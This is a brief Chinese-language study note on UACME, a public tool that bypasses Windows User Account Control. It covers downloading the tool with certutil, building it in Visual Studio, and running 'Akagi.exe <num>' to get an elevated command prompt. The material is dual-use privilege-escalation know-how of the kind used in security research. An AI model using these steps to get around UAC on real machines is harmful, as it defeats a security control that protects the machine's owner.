【笔记】UACME学习笔记

前言

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.(Github

下载项目

1
2
certutil -urlcache -split -f https://codeload.github.com/hfiref0x/UACME/zip/refs/tags/v3.6.6
"C:\Program Files\7-Zip\7z.exe" x UACME-3.6.6.zip

编译项目

安装VisualStudio环境

  • 勾选.NET 桌面开发使用 C++ 的桌面开发环境->安装

打开项目

  • UACME-3.6.6\Source\uacme.sln右键打开方式->Microsoft Visual Studio 2022

  • 右键Akagi->重新生成->编译完成后提示1成功

  • UACME-3.6.6\Source\Akagi\output\x64\Debug下会生成Akagi.exe可执行文件

获取一个提权后的cmd

<num>:可用的脚本编号,范围为[1,79]

1
Akagi.exe <num>

提权任意可执行程序

1
Akagi.exe <num> c:\windows\system32\cmd.exe

完成

参考文献

u1timate的博客